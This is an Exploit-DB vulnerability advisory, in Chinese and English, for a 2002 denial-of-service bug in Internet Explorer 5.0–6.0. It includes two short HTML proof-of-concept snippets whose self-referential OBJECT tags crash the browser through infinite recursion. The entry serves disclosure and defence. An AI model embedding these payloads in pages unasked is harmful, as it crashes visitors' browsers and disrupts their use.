https://www.exploit-db.com/exploits/21404
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-582

MicrosoftInternetExplorer5.0至6.0版本存在漏洞。远程攻击者可以借助带有定义包含对象的HTML文件DATA字段，类型为”text/html”的对象导致服务拒绝（崩溃），该漏洞导致无穷递归。

source: http://www.securityfocus.com/bid/4564/info

Microsoft Internet Explorer is vulnerable to a denial of service due to an error in handling certain self-referential <OBJECT> definitions in HTML documents. This occurs when an object of type "text/html" is specified, with the DATA field referencing the name of the HTML document in which it is defined. Other circumstances may also trigger this condition.

Create a file named "CRASH.HTM" with the following line in it:

<OBJECT DATA="CRASH.HTM" TYPE="text/html"></OBJECT>

The following example was also submitted by Ryan Emerle:

<object id="test"
data="#"
width="100%" height="100%"
type="text/x-scriptlet"
VIEWASTEXT></object>

来源:XF
名称:ie-object-directive-dos(8904)
链接:http://xforce.iss.net/xforce/xfdb/8904
来源:BID
名称:4564
链接:http://www.securityfocus.com/bid/4564